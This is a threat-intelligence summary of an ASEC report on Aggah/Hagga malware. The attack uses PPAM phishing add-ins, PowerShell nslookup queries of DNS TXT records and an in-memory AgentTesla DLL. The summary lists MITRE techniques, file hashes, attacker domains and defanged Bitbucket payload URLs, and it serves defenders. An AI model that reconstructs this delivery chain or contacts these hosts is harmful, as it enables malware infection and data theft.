Threat Research

Malware Execution Method Using DNS TXT Record – ASEC BLOG

Securonix

ASEC documents a malware execution technique that leverages DNS TXT records — a relatively uncommon method that can aid in command retrieval and evasion. The activity includes phishing with a PPAM PowerPoint add-in, PowerShell-driven nslookup, DNS TXT data storage, and remote DLL/AgentTesla payloads associated with Hagga/Aggah. #Aggah #Hagga #abena-dk.cam #AgentTesla #PPAM #PowerShell #DNS

Keypoints

  • DNS TXT records are used during malware execution, a method not widely utilized for this purpose.
  • Phishing email delivers a PowerPoint add-in (PPAM) with macros to trigger the attack.
  • The macro uses PowerShell to run nslookup and then queries DNS TXT records as part of the kill chain.
  • Threat actors embed commands for subsequent steps inside DNS TXT records to evade detection.
  • DNS TXT responses differ between normal records and threat actor infrastructure, including multiple abena-dk.cam subdomains and tests with calc/vbs activities.
  • The payload chain downloads a Base64-encoded DLL from an external URL and executes it in memory, linked to Hagga/Aggah and AgentTesla.

MITRE Techniques

  • [T1566.001] Phishing: Spearphishing Attachment – “The threat actor attached a PowerPoint add-in (PPAM) file pretending to be an “Order Inquiry” in a phishing email.”
  • [T1059.005] Visual Basic – “PowerPoint macro” executes code; macro code is simple and triggers later steps.
  • [T1059.001] PowerShell – “the nslookup management tool is being executed through PowerShell.”
  • [T1071.004] Application Layer Protocol: DNS – “the DNS TXT record is queried afterward.”
  • [T1105] Ingress Tool Transfer – “downloads a Base64-encoded binary from another external URL through PowerShell.”
  • [T1055] Process Injection – “threat actor is making various attempts on child processes to evade detection by anti-malware products.”

Indicators of Compromise

  • [Hash] File Hash – f6b8a4c6ed15a1a17896797ce3fe2440, 4a647e9baffe95acb9e2ec989b23808b – used as payload indicators
  • [Domain] Domains – abena-dk.cam, calc.abena-dk.cam, blessed.abena-dk.cam, methew.abena-dk.cam
  • [URL] External payload sources – hxxps://bitbucket[.]org/mounmeinlylo/rikirollin/downloads/methewPayload.js, hxxps://bitbucket[.]org/mounmeinlylo/rikirollin/downloads/blessed_Payload.js

Read more: https://asec.ahnlab.com/en/54916/